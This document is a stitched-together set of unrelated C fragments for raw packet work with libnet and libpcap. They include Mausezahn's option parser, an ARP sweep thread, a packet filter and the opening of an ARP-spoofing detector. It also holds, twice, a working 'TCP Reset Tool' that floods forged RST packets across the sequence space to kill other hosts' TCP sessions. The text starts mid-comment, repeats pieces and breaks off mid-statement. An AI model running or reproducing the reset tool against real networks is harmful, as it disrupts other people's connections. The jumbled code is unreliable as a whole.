Getting a local * MAC address requires implementing ARP, which we won't do * at this moment */ (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_WRITE_IP; } debug3 ("injection_write_ip: IP address %s can be reached ", inet_ntoa(in)); debug3 ("through gateway %s (%s)\n", inet_ntoa(gw), buffer); } else { debug3 ("injection_write_ip: IP address %s corresponds to %s\n", inet_ntoa(in), buffer); } if ((tmp_eth = ether_aton (buffer)) == NULL) { (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_WRITE_IP; } memcpy (&remote_eth, tmp_eth, 6); /* build ethernet header and use IP packet as payload */ #if (defined(bsdi) || defined(__NetBSD__) || defined(__OpenBSD__) ||\ defined(__FreeBSD__)) libnet_build_ethernet(&(remote_eth.octet[0]), &(local_eth.octet[0]), ETHERTYPE_IP, NULL, 0, buffer); #else libnet_build_ethernet(&(remote_eth.ether_addr_octet[0]), &(local_eth.ether_addr_octet[0]), ETHERTYPE_IP, NULL, 0, buffer); #endif memcpy (buffer+LIBNET_ETH_H, ip_packet, packet_size); packet_size += LIBNET_ETH_H; /* inject the packet */ if ((i = libnet_write_link_layer (network, interface, buffer, packet_size)) < packet_size) { (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_WRITE_IP; } /* shut down the interface */ (void)libnet_close_link_interface(network); return WIRE_ERR_NONE; #else /* INJECT_USING_LINK_LAYER */ return(0); #endif /* INJECT_USING_LINK_LAYER */ }
seqincrement= atoi(argv[7]); seqstart= 0; seqmax = 4294967295; /* 2^32 */ payload = NULL; payload_s = 0; src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE); dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE); memset(enet_dst, 0, sizeof(enet_dst)); sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0], &enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4], &enet_dst[5]); l = libnet_init(LIBNET_LINK,device,errbuf); ptr_enet_src = libnet_get_hwaddr(l); memcpy(&enet_src[0], ptr_enet_src,6); printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3], enet_src[4],enet_src[5]); printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3], enet_dst[4],enet_dst[5]); for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) { count++; count2++; if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); } l = libnet_init(LIBNET_LINK,device,errbuf); t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0); t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0); t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0); t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
// Purpose: Properly handle arguments and configure global structs (tx) int getopts (int argc, char *argv[]) { int i, c, rargs, RX=0, count_set=0, delay_set=0; unsigned int time_factor; char *packet_type=NULL, *mops_type=NULL; char *dum; unsigned char *dum1, *dum2; libnet_t *l; char err_buf[LIBNET_ERRBUF_SIZE]; struct libnet_ether_addr *mymac; FILE *afp; char hexpld[MAX_PAYLOAD_SIZE*2]; int hexpld_specified=0; opterr = 1; // let getopt print error message if necessary while ((c = getopt (argc, argv, "hqvVSxra:A:b:B:c:d:f:F:p:P:t:T:M:Q:X:")) != -1) switch (c) { case 'h': usage(); break; case 'q': quiet=1; break; case 'v': verbose=1; break; case 'V': verbose=2; break; case 'S': simulate=1; break; case 'x': mz_port = MZ_DEFAULT_PORT; break; case 'a': strncpy (tx.eth_src_txt, optarg, 32); tx.packet_mode = 0; break; case 'A': strncpy (tx.ip_src_txt, optarg, 32); break; case 'b': strncpy (tx.eth_dst_txt, optarg, 32); tx.packet_mode = 0; break; case 'B': strncpy (tx.ip_dst_txt, optarg, 32); break; case 'c': errno=0; tx.count = strtol(optarg, (char **)NULL, 10); if ((errno == ERANGE && (tx.count == LONG_MAX || tx.count == LONG_MIN)) || (errno != 0 && tx.count == 0)) { perror("strtol"); return (-1); } if (tx.count<0) tx.count=1; //TODO: Allow count=0 which means infinity (need to update all send_functions) count_set=1; break; case 'd': errno=0; // determine whether seconds or msecs are used // default is usec!!! time_factor=1; if (exists(optarg,"s") || exists(optarg,"sec")) time_factor=1000000; if (exists(optarg,"m") || exists(optarg,"msec")) time_factor=1000; dum = strtok(optarg,"ms"); tx.delay = strtol(dum, (char **)NULL, 10) * time_factor; if ((errno == ERANGE && (tx.delay == LONG_MAX || tx.delay == LONG_MIN)) || (errno != 0 && tx.delay == 0)) { perror("strtol"); return (-1); } if (tx.delay<0) tx.delay=0; // no delay delay_set=1; break; case 'p': errno=0; tx.padding = strtol(optarg, (char **)NULL, 10); if ((errno == ERANGE && (tx.padding == LONG_MAX || tx.padding == LONG_MIN)) || (errno != 0 && tx.padding == 0)) { perror("strtol"); return (-1); } if (tx.padding>10000) { fprintf(stderr, " Warning: Padding must not exceed 10000!\n"); return -1; } break; case 't': packet_type = optarg; // analyzed below break; case 'X': mops_type = optarg; // MOPS TRANSITION STRATEGY -- analyzed below break; case 'T': packet_type = optarg; RX = 1; break; case 'r': mz_rand = 1; break; case 'M': if (strncmp(optarg,"help",4)==0) { (void) get_mpls_params("help "); } else { strncpy (tx.mpls_txt, optarg, 128); tx.eth_type = ETHERTYPE_MPLS; tx.packet_mode = 0; tx.mpls=1; } break; case 'P': // ASCII payload strncpy((char*)tx.ascii_payload, optarg, MAX_PAYLOAD_SIZE); tx.ascii = 1; break; case 'f': // ASCII payload in FILE afp = fopen(optarg, "r"); if (fgets((char*)tx.ascii_payload, MAX_PAYLOAD_SIZE, afp) == NULL) fprintf(stderr, " mz/getopts: File empty?\n"); fclose(afp); tx.ascii = 1; break; case 'F': // HEX payload in FILE afp = fopen(optarg, "r"); i=0; while ( (hexpld[i]=fgetc(afp))!=EOF ) { if (isspace(hexpld[i])) { hexpld[i]=':'; } i++; } hexpld[i]='\0'; fclose(afp); hexpld_specified=1; break; case 'Q': // VLAN TAG if (strncmp(optarg,"help",4)==0) { print_dot1Q_help(); // ugly but most simple and safe solution } else { strncpy (tx.dot1Q_txt, optarg, 32); tx.dot1Q=1; // determine number of VLAN tags for (i=0; i<strlen(tx.dot1Q_txt); i++) { if (tx.dot1Q_txt[i]==',') tx.dot1Q++; } tx.packet_mode = 0; } break; case '?': if ((optopt == 'a') || (optopt == 'b') || (optopt = 'c') || (optopt == 'd') || (optopt == 'f') || (optopt = 'p') || (optopt == 't') || (optopt == 'm')) fprintf (stderr, " mz/getopts: Option -%c requires an argument.\n", optopt); else if (isprint (optopt)) fprintf (stderr, " mz/getopts: Unknown option -%c'.\n", optopt); else fprintf (stderr, " mz/getopts: Unknown option character \\x%x'.\n", optopt); return 1; default: fprintf (stderr," mz/getopts: Could not handle arguments properly!\n"); return 1; } // ******************************************** // Handle additional arguments // ******************************************** // // Greeting text if (verbose) { fprintf(stderr,"\n" MAUSEZAHN_VERSION "\n" "Use at your own risk and responsibility!\n" "-- Verbose mode --\n" "\n"); } if (argc<2) { usage(); } if ((rargs=argc-optind)>2) { // number of remaining arguments fprintf(stderr," mz/getopts: Too many arguments!\n"); return -1; } // There can be 0-2 additional arguments switch (rargs) { case 0: if (lookupdev()) { // no device found if (verbose) fprintf(stderr, " mz: no active interfaces found!\n"); strcpy(tx.device, "lo"); } fprintf(stderr," mz: You must specify an interface. Use ifconfig and try again.\n"); exit(0); case 1: // arg_string OR device given => find out! if ( dev_exists(argv[optind]) ) { strncpy (tx.device, argv[optind], 16); } else { /// arg_string given => no device has been specified -- let's find one! strncpy (tx.arg_string, argv[optind], MAX_PAYLOAD_SIZE); if (lookupdev()) { // no device found if (verbose) fprintf(stderr, " mz: no active interfaces found!\n"); strcpy(tx.device, "lo"); } fprintf(stderr," mz: You must specify a valid interface. Use ifconfig and try again.\n"); exit(0); } break; case 2: // both device and arg_string given if(dev_exists(argv[optind])) { strncpy (tx.device, argv[optind], 16); strncpy (tx.arg_string, argv[optind+1], MAX_PAYLOAD_SIZE); } else if(dev_exists(argv[optind+1])) { strncpy (tx.device, argv[optind+1], 16); strncpy (tx.arg_string, argv[optind], MAX_PAYLOAD_SIZE); } else { if (lookupdev()) { // no device found if (verbose) fprintf(stderr, " mz: no active interfaces found!\n"); strcpy(tx.device, "lo"); } fprintf(stderr," mz: You must specify a valid interface. Use ifconfig and try again.\n"); exit(0); } break; default: fprintf(stderr," mz/getopts: Unknown argument problem!\n"); return 1; } if(verbose) { if(tx.device) fprintf(stderr," mz: Selected interface: %s\n",tx.device ); if(tx.arg_string) fprintf(stderr," mz: Selected argument string: %s\n", tx.arg_string); } if (hexpld_specified) { strcat(tx.arg_string, ",p="); strcat(tx.arg_string, hexpld); } ////////////////////////////////////////////////////////////////////////// // // Initialize MAC and IP Addresses. // // - tx.eth_src = own interface MAC // - tx.ip_src = own interface IP or user specified // - tx.ip_dst = 255.255.255.255 or user specified (can be a range) // - tx.ip_src_rand ... is set if needed. // // Get own device MAC address: // Don't open context if only a help text is requested if (getarg(tx.arg_string,"help", NULL)!=1) { l = libnet_init (LIBNET_LINK_ADV, tx.device, err_buf ); if (l == NULL) { fprintf(stderr, " mz/getopts: libnet_init() failed (%s)", err_buf); return -1; } mymac = libnet_get_hwaddr(l); for (i=0; i<6; i++) { tx.eth_src[i] = mymac->ether_addr_octet[i]; tx.eth_mac_own[i] = mymac->ether_addr_octet[i]; } // Set source IP address: if (strlen(tx.ip_src_txt)) { // option -A has been specified if (mz_strcmp(tx.ip_src_txt, "bcast", 2)==0) { tx.ip_src = libnet_name2addr4 (l, "255.255.255.255", LIBNET_DONT_RESOLVE); } else if (strcmp(tx.ip_src_txt, "rand") == 0) { tx.ip_src_rand = 1; tx.ip_src_h = (u_int32_t) ( ((float) rand()/RAND_MAX)*0xE0000000); //this is 224.0.0.0 } else if (get_ip_range_src(tx.ip_src_txt)) { // returns 1 when no range has been specified // name2addr4 accepts a DOTTED DECIMAL ADDRESS or a FQDN: tx.ip_src = libnet_name2addr4 (l, tx.ip_src_txt, LIBNET_RESOLVE); } } else { // no source IP specified: by default use own IP address tx.ip_src = libnet_get_ipaddr4(l); } // Set destination IP address: if (strlen(tx.ip_dst_txt)) { // option -B has been specified if (mz_strcmp(tx.ip_dst_txt, "rand", 2)==0) { fprintf(stderr, "Option -B does not support random destination IP addresses currently.\n"); return 1; } if (mz_strcmp(tx.ip_dst_txt, "bcast", 2)==0) { tx.ip_dst = libnet_name2addr4 (l, "255.255.255.255", LIBNET_DONT_RESOLVE); } else if (get_ip_range_dst(tx.ip_dst_txt)) { // returns 1 when no range has been specified // name2addr4 accepts a DOTTED DECIMAL ADDRESS or a FQDN: tx.ip_dst = libnet_name2addr4 (l, tx.ip_dst_txt, LIBNET_RESOLVE); } } else { // no destination IP specified: by default use broadcast tx.ip_dst = libnet_name2addr4 (l, "255.255.255.255", LIBNET_DONT_RESOLVE); } // Initialize tx.ip_src_h and tx.ip_dst_h which are used by 'print_frame_details()' // in verbose mode. See 'modifications.c'. if (tx.ip_src_rand) { // ip_src_h already given, convert to ip_src dum1 = (unsigned char*) &tx.ip_src_h; dum2 = (unsigned char*) &tx.ip_src; } else { // ip_src already given, convert to ip_src_h dum1 = (unsigned char*) &tx.ip_src; dum2 = (unsigned char*) &tx.ip_src_h; } *dum2 = *(dum1+3); dum2++; *dum2 = *(dum1+2); dum2++; *dum2 = *(dum1+1); dum2++; *dum2 = *dum1; dum1 = (unsigned char*) &tx.ip_dst; dum2 = (unsigned char*) &tx.ip_dst_h; *dum2 = *(dum1+3); dum2++; *dum2 = *(dum1+2); dum2++; *dum2 = *(dum1+1); dum2++; *dum2 = *dum1; libnet_destroy(l); } // // END OF ADDRESS INITIALIZATION // ////////////////////////////////////////////////////////////////////////// ////// retrieve interface parameters /////// for (i=0; i<device_list_entries; i++) { get_dev_params(device_list[i].dev); } ////////////////////////////////////////////////////////////////////////// // // Mausezahn CLI desired? if (mz_port) { // has port number been specified? if (strlen(tx.arg_string)) { mz_port = (int) str2int (tx.arg_string); } if (!quiet) { fprintf(stderr, "Mausezahn accepts incoming Telnet connections on port %i.\n", mz_port); } mz_cli_init(); cli(); } ////////////////////////////////////////////////////////////////////////// // // Mode decision // // Consider -t and -m option (used exclusively) // -t => special packet types, stateless // // If -t not present then evaluate arg_string which must // contain a byte-string in hexadecimal notation. // // // ***** NEW: MOPS TRANSITION STRATEGY ***** if (mops_type != NULL) { if (mz_strcmp(mops_type,"lldp",4)==0) { mops_direct(tx.device, MOPS_LLDP, tx.arg_string); } } if (packet_type == NULL) { // raw hex string given mode = BYTE_STREAM; } else if (strcmp(packet_type,"arp")==0) { mode = ARP; } else if (strcmp(packet_type,"bpdu")==0) { mode = BPDU; } else if (strcmp(packet_type,"ip")==0) { mode = IP; } else if (strcmp(packet_type,"udp")==0) { mode = UDP; } else if (strcmp(packet_type,"icmp")==0) { mode = ICMP; } else if (strcmp(packet_type,"tcp")==0) { mode = TCP; } else if (strcmp(packet_type,"dns")==0) { mode = DNS; } else if (strcmp(packet_type,"cdp")==0) { mode = CDP; } else if (strcmp(packet_type,"syslog")==0) { mode = SYSLOG; } else if (strcmp(packet_type,"lldp")==0) { mode = LLDP; tx.packet_mode=0; // create whole frame by ourself } else if (strcmp(packet_type,"rtp")==0) { if (RX) { mode = RX_RTP; } else { mode = RTP; if (!count_set) tx.count = 0; if (!delay_set) tx.delay = 20000; // 20 msec inter-packet delay for RTP } } else if (strcmp(packet_type,"help")==0) { fprintf(stderr, "\n" MAUSEZAHN_VERSION "\n" "| The following packet types are currently implemented:\n" "|\n" "| arp ... sends ARP packets\n" "| bpdu ... sends BPDU packets (STP or PVST+)\n" "| cdp ... sends CDP messages\n" "| ip ... sends IPv4 packets\n" "| udp ... sends UDP datagrams\n" "| tcp ... sends TCP segments\n" "| icmp ... sends ICMP messages\n" "| dns ... sends DNS messages\n" "| rtp ... sends RTP datagrams\n" "| syslog ... sends Syslog messages\n" "|\n" "| Of course you can build any other packet type 'manually' using the direct layer 2 mode.\n" "| FYI: The interactive mode supports additional protocols. (Try mz -x <port>)\n" "\n" ); exit(1); } else { fprintf(stderr, " mz: you must specify a valid packet type!\n"); } ////////////////////////////////////////////////////////////////////////// // TODO: Implement macro support // Check macro types here return 0; }
int main(int argc, char *argv[]) { int c; unsigned long int count=0; unsigned long int count2=0; unsigned long int seqguess=0; unsigned long int seqstart=0; unsigned long int seqincrement=0; unsigned long int seqmax=4294967295; u_char *cp; libnet_t *l; libnet_ptag_t t; char *payload; char * device = argv[1]; u_short payload_s; u_long src_ip, dst_ip; u_short src_prt, dst_prt; char errbuf[LIBNET_ERRBUF_SIZE]; char sourceip[32] = ""; char destinationip[32] = ""; /* Change these to suit your local environment values */ /* Make enet_dst either the default gateway or destination host */ struct libnet_ether_addr *ptr_enet_src; u_char enet_src[6]; u_char enet_dst[6]; u_char org_code[3] = {0x00, 0x00, 0x00}; /* Its only test code, so minimal checking is performed... */ if (argc<8) { printf("TCP Reset Tool v1.2\nBy Paul Watson - Modified by J. Barber\n"); printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [gateway/destination MAC] [window size]\n",argv[0]); printf("Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536\n"); exit(1); } strcpy(sourceip,argv[2]); src_prt = atoi(argv[3]); strcpy(destinationip,argv[4]); dst_prt = atoi(argv[5]); seqincrement= atoi(argv[7]); seqstart= 0; seqmax = 4294967295; /* 2^32 */ payload = NULL; payload_s = 0; src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE); dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE); memset(enet_dst, 0, sizeof(enet_dst)); sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0], &enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4], &enet_dst[5]); l = libnet_init(LIBNET_LINK,device,errbuf); ptr_enet_src = libnet_get_hwaddr(l); memcpy(&enet_src[0], ptr_enet_src,6); printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3],enet_src[4],enet_src[5]); printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3],enet_dst[4],enet_dst[5]); for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) { count++; count2++; if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); } l = libnet_init(LIBNET_LINK,device,errbuf); t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0); t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0); t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0); t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0); c = libnet_write(l); } printf("packets sent: %i\n",count); return (EXIT_FAILURE); }
void *ted_arpmon_thread( void *arg ){ ted_context_t *ted = (ted_context_t *)arg; struct libnet_ether_addr *if_mac; struct in_addr if_ip; libnet_t *nd; char n_error[LIBNET_ERRBUF_SIZE]; char p_error[PCAP_ERRBUF_SIZE]; unsigned int nhosts, i, ip; libnet_ptag_t net = LIBNET_PTAG_INITIALIZER, arp = LIBNET_PTAG_INITIALIZER; unsigned char unknown_hw[ETH_ALEN] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, bcast_hw[ETH_ALEN] = { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF }; pthread_t tid; if( (nd = libnet_init( LIBNET_LINK, ted->device, n_error )) == NULL ){ ted_die( "Error initializing libnet layer (%s) .\n", n_error ); } if( (if_mac = libnet_get_hwaddr( nd )) == NULL ){ ted_die( "Error retrieving %s MAC address .\n", ted->device ); } if( (if_ip.s_addr = libnet_get_ipaddr4( nd )) < 0 ){ ted_die( "Error retrieving %s bound ip address .\n", ted->device ); } ted->pd = pcap_open_live( ted->device, 65535, 1, 1000, p_error ); if( (ted->datalink = pcap_datalink(ted->pd)) < 0 ){ ted_die( "Error retrieving %s data link layer (%s) .\n", ted->device, p_error ); } switch( ted->datalink ) { case DLT_RAW : ted->head_shift = 0; break; case DLT_PPP : case DLT_LOOP : case DLT_NULL : ted->head_shift = 4; break; case DLT_PPP_ETHER : ted->head_shift = 8; break; case DLT_EN10MB : case DLT_EN3MB : ted->head_shift = 14; break; case DLT_LINUX_SLL : case DLT_SLIP : ted->head_shift = 16; break; case DLT_SLIP_BSDOS : case DLT_PPP_BSDOS : case DLT_IEEE802_11 : ted->head_shift = 24; break; case DLT_PFLOG : ted->head_shift = 48; break; default : ted_die( "Device datalink not supported .\n" ); } pcap_lookupnet( ted->device, &ted->network, &ted->netmask, p_error ); if( pthread_create( &tid, NULL, ted_arpmon_recv_thread, (void *)ted ) != 0 ){ ted_die( "Could not create alive hosts reciever thread .\n" ); } nhosts = ntohl(~ted->netmask); while( 1 ){ for( i = 1; i <= nhosts; i++ ){ ip = (if_ip.s_addr & ted->netmask) | htonl(i); // don't send arp request to ourself :P if( ip != if_ip.s_addr ){ arp = libnet_build_arp( ARPHRD_ETHER, ETHERTYPE_IP, ETH_ALEN, 4, ARPOP_REQUEST, // sender if_mac->ether_addr_octet, (unsigned char *)&if_ip, // reciever unknown_hw, (unsigned char *)&ip, NULL, 0, nd, arp ); net = libnet_build_ethernet( bcast_hw, if_mac->ether_addr_octet, ETHERTYPE_ARP, NULL, 0, nd, net ); if( libnet_write(nd) < 0 ){ ted_die( "Could not send ARP request .\n" ); } } } usleep( ted->arp_delay ); } }
int packet_filter() { char *dev, *nextdev; bpf_u_int32 mask; bpf_u_int32 net; struct bpf_program fp; char filter_exp[] = "ip and not dst host 172.16.205.1"; char errbuf[PCAP_ERRBUF_SIZE]; struct pcap_pkthdr header; const u_char *packet; libnet_t *int_llif, *ext_llif; struct ether_addr *t_hwaddr; pthread_t ntid; /* if ((dev = pcap_lookupdev(errbuf)) == NULL) { fprintf(stderr, "Couldn't find default device: %s\n", errbuf); return(2); } printf("Device: %s\n", dev); */ if (get_default_gateway(&def_gw) != 0) { fprintf(stderr, "Couldn't get default gateway\n"); return(2); } printf("gw: %s\n", inet_ntoa(def_gw)); /* initialize handler/filter for external network interface */ dev = ext_ifname; if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) { fprintf(stderr, "Couldn't get netmask for the device %s\n", dev); return(2); } printf("net: %s, mask %s\n", inet_ntoa(*(struct in_addr *)&net), inet_ntoa(*(struct in_addr *)&mask)); if ((ext_if = pcap_open_live(dev, BUFSIZ, 1, 1000, errbuf)) == NULL) { fprintf(stderr, "Couldn't open device %s: %s\n", dev,errbuf); return(2); } if(pcap_compile(ext_if, &fp, filter_exp, 0, net) == -1) { fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(ext_if)); return(2); } if(pcap_setfilter(ext_if, &fp) == -1) { fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(ext_if)); return(2); } if ((ext_llif = libnet_init(LIBNET_LINK, ext_ifname, errbuf)) == 0) { fprintf(stderr, "Couldn't open local network interface %s: %s\n", ext_ifname, errbuf); return(2); } if ((*((u_int *)&ext_ip) = libnet_get_ipaddr4(ext_llif)) == -1) { fprintf(stderr, "Couldn't get local ip address for %s \n", ext_ifname); return(2); } if ((t_hwaddr = (struct ether_addr *)libnet_get_hwaddr(ext_llif)) == NULL) { fprintf(stderr, "Couldn't get local network interface address for %s \n", ext_ifname); return(2); } memcpy((u_char *)&ext_hwaddr, (u_char *)t_hwaddr, ETHER_ADDR_LEN); libnet_destroy(ext_llif); if (get_netmask(ext_ifname, &ext_mask) == -1) { fprintf(stderr, "Couldn't get local netmask for %s \n", ext_ifname); return(2); } printf("ext_ip : %s ", inet_ntoa(ext_ip) ); printf("ext_ip : %s\n", inet_ntoa(ext_mask)); /* initialize handler/filter for internal network interface */ dev = int_ifname; if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) { fprintf(stderr, "Couldn't get netmask for the device %s\n", dev); return(2); } printf("net: %s, mask %s\n", inet_ntoa(*(struct in_addr *)&net), inet_ntoa(*(struct in_addr *)&mask)); if ((int_if = pcap_open_live(dev, BUFSIZ, 1, 1000, errbuf)) == NULL) { fprintf(stderr, "Couldn't open device %s: %s\n", dev,errbuf); return(2); } if(pcap_compile(int_if, &fp, filter_exp, 0, net) == -1) { fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(int_if)); return(2); } if(pcap_setfilter(int_if, &fp) == -1) { fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(int_if)); return(2); } if ((int_llif = libnet_init(LIBNET_LINK, int_ifname, errbuf)) == 0) { fprintf(stderr, "Couldn't open local network interface %s: %s\n", int_ifname, errbuf); return(2); } if ((*((u_int *)&int_ip) = libnet_get_ipaddr4(int_llif)) == -1) { fprintf(stderr, "Couldn't get local ip address for %s \n", int_ifname); return(2); } if ((t_hwaddr = (struct ether_addr *)libnet_get_hwaddr(int_llif)) == NULL) { fprintf(stderr, "Couldn't get local network interface address for %s \n", int_ifname); return(2); } memcpy((u_char *)&int_hwaddr, (u_char *)t_hwaddr, ETHER_ADDR_LEN); libnet_destroy(int_llif); if (pthread_create(&ntid, NULL, clean_thread, NULL) != 0) { fprintf(stderr, "Couldn't create thread\n"); } if (pthread_create(&ntid, NULL, ext_thread, NULL) != 0) { fprintf(stderr, "Couldn't create thread\n"); } if(pcap_loop(int_if, -1, got_packet, (void *)FROM_INT) == -1) { fprintf(stderr, "Couldn't filte packet %s: %s\n", filter_exp, pcap_geterr(int_if)); } pcap_close(int_if); return(0); }
int main (int argc, char **argv) { int c, valid, bnr = 9, showpopup = 0, flags = 0; /* temporary vars */ char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */ libnet_t *l; /* libnet handle for address retrieval */ char libnet_errbuf[LIBNET_ERRBUF_SIZE]; /* libnet error messages */ char start_time[24], end_time[24]; time_t acurtime, bcurtime; struct tm *aloctime, *bloctime; struct configuration conf, *config=&conf; /* struct to hold config for current session */ struct validated_queue *start = NULL, *end = NULL; /* pointers to validated queue */ /* get current system time */ acurtime = time (NULL); /* convert it to local time representation */ aloctime = localtime (&acurtime); /* format time struct into a char array */ strftime (start_time, 24, "%d/%b/%Y %H:%M:%S", aloctime); /* load default params in config struct */ config->flags = 0; config->verbose = 0; config->queue_size = 0; config->dev = NULL; config->dport = HTTP; config->mode = DETECT; config->gtimeout = TIME_OUT; config->scan_type = SYN_SCAN; config->a_port_name = "HTTP"; config->a_scan_type = "SYN_SCAN"; /* parse and load cmd-line params in config struct */ while ((c = getopt (argc, argv, "hi:p:Parsfuetvg:o")) != -1) { switch (c) { case 'h': print_usage (); exit (EXIT_SUCCESS); case 'i': config->dev = optarg; break; case 'p': if (1 <= atoi (optarg) && 65535 >= atoi (optarg)) { config->dport = atoi (optarg); } break; case 'P': config->mode = PREVENT; break; case 'a': config->scan_type = ACK_SCAN; config->flags = config->flags | ACK; flags = flags | ACK; break; case 'r': config->scan_type = RST_SCAN; config->flags = config->flags | RST; flags = flags | RST; break; case 's': config->scan_type = SYN_SCAN; config->flags = config->flags | SYN; flags = flags | SYN; break; case 'f': config->scan_type = FIN_SCAN; config->flags = config->flags | FIN; flags = flags | FIN; break; case 'u': config->scan_type = UDP_SCAN; config->a_scan_type = "UDP_SCAN"; break; case 'e': config->scan_type = ECHO_SCAN; config->a_scan_type = "ECHO_SCAN"; break; case 't': config->scan_type = TSTAMP_SCAN; config->a_scan_type = "TSTAMP_SCAN"; break; case 'v': config->verbose = 1; break; case 'g': if (1 <= atoi (optarg) && 9 >= atoi (optarg)) { config->gtimeout = atoi (optarg); } break; case 'o': showpopup = 1; break; case '?': if ('i' == optopt || 'p' == optopt) { print_usage (); exit (EXIT_FAILURE); } else if (isprint (optopt)) { printf ("\n [-] unknown option `-%c'\n", optopt); print_usage (); exit (EXIT_FAILURE); } else { printf ("\n unknown option character `\\x%x'\n", optopt); print_usage (); exit (EXIT_FAILURE); } default: print_usage (); exit (EXIT_FAILURE); } } if (0 == flags) { config->flags = SYN; } else if (ACK == flags) { config->a_scan_type = "ACK_SCAN"; } else if (RST == flags) { config->a_scan_type = "RST_SCAN"; } else if (SYN == flags) { config->a_scan_type = "SYN_SCAN"; } else if (FIN == flags) { config->a_scan_type = "FIN_SCAN"; } /* print an ASCII-ART banner */ print_banner (); switch (config->dport) { case HTTP: config->a_port_name = "HTTP"; break; case FTP: config->a_port_name = "FTP"; break; case TELNET: config->a_port_name = "TELNET"; break; case SSH: config->a_port_name = "SSH"; break; case SMTP: config->a_port_name = "SMTP"; break; default: config->a_port_name = "UNKNOWN"; break; } /* check if we are root, else exit */ if (0 != getuid ()) { printf ("\n [!] you need to be root buddy...\n\n"); exit (EXIT_FAILURE); } /* find a capture device if not specified on command-line */ if (config->dev == NULL) { config->dev = pcap_lookupdev (errbuf); if (config->dev == NULL) { printf ("\n [-] could not find default device: %s\n\n", errbuf); exit (EXIT_FAILURE); } } /* initialize libnet library to find local mac and ip addresses */ l = libnet_init (LIBNET_LINK, config->dev, libnet_errbuf); if (NULL == l) { printf ("\n [-] libnet_init() failed: %s\n\n", libnet_errbuf); exit (EXIT_FAILURE); } /* fetch local mac address */ config->macaddr = libnet_get_hwaddr (l); if (NULL == config->macaddr) { printf ("\n [-] could not fetch local mac address: %s\n\n", libnet_geterror (l)); libnet_destroy (l); exit (EXIT_FAILURE); } else { snprintf (config->llmac, 18, "%02x:%02x:%02x:%02x:%02x:%02x", config->macaddr->ether_addr_octet[0], config->macaddr->ether_addr_octet[1], config->macaddr->ether_addr_octet[2], config->macaddr->ether_addr_octet[3], config->macaddr->ether_addr_octet[4], config->macaddr->ether_addr_octet[5]); } /* fetch local ip address */ config->ipaddr = libnet_get_ipaddr4 (l); if (-1 == config->ipaddr) { printf ("\n [-] could not fetch local ip address: %s\n\n", libnet_geterror (l)); libnet_destroy (l); exit (EXIT_FAILURE); } else { snprintf (config->llip, 16, "%s", libnet_addr2name4 (config->ipaddr, LIBNET_DONT_RESOLVE)); } printf (" [+] session started at %s \n", start_time); printf (" [+] default configuration and cmd-line parameters loaded\n"); printf (" [+] device: \"%s\", mode: \"%s\", port: \"%s\", scan-type: \"%s\"\n", config->dev, (config->mode)? "PREVENT" : "DETECT", config->a_port_name, config->a_scan_type); /* start repeat loop */ /* call sniffer module to fill up our config struct with packet fields */ printf (" [+] calling arp-sniffer module to capture incoming arp packets\n"); config = sniffer (config); printf ("\n [+] above arp packet was captured and respective fields were saved for analysis\n"); printf (" [+] calling anamoly-detection module to perform static analysis on saved packet fields\n"); /* call static_analysis module to perform some static checks on packet fields */ valid = static_analysis (conf); if (EXIT_FAILURE == valid) { printf (" [+] analyzed arp packet seems to be specially-crafted. kernel might have added the" " poisonous SIP-SMAC entry in arp cache\n"); if (DETECT == conf.mode) { printf (" [+] 